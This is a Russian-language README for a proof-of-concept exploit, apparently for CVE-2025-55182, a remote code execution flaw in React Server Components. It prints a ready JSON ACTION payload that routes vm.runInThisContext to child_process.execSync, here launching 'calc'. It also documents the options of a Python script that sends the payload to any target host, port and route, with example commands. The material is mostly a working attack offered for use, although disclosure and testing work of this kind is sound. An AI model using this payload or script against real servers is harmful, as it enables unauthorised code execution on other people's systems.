
Эксплойт для проверки концепции CVE-2025-55182, демонстрирующий удаленное выполнение кода в React Server Components через вредоносные полезные нагрузки ACTION и инъекцию vm.runInThisContext.
Данный проект представляет CVE-2025-55182 - React Server Components (RSC) RCE Proof of Concept, демонстрирующий возможность удаленного выполнения кода в определенных условиях с помощью vm.runInThisContext и злонамеренного ACTION payload.
ACTION payload в React Server Components при определенных условиях:
Злоумышленник может сформировать такой payload:
{
"$ACTION_REF_0": "",
"$ACTION_0:0": "{\"id\": \"vm#runInThisContext\", \"bound\": [\"global.process.mainModule.require('child_process').execSync('calc').toString()\"]}"
}
| Параметр | Обязательный | По умолчанию | Описание |
|---|---|---|---|
--host | Да | нет | IP-адрес или домен целевого сервера. Например: 127.0.0.1, 192.168.1.10, example.com |
--port | Нет | 80 | Порт HTTP-сервера цели, например: 3003 |
--path | Да | нет | Путь маршрута, подверженного уязвимости, например: /feedback, /action |
--https | Нет | False | Использовать HTTPS для отправки payload (по умолчанию HTTP) |
python a.py --host <целевой IP> --port <порт> --path <путь URL>
python a.py --host 127.0.0.1 --port 3003 --path /feedback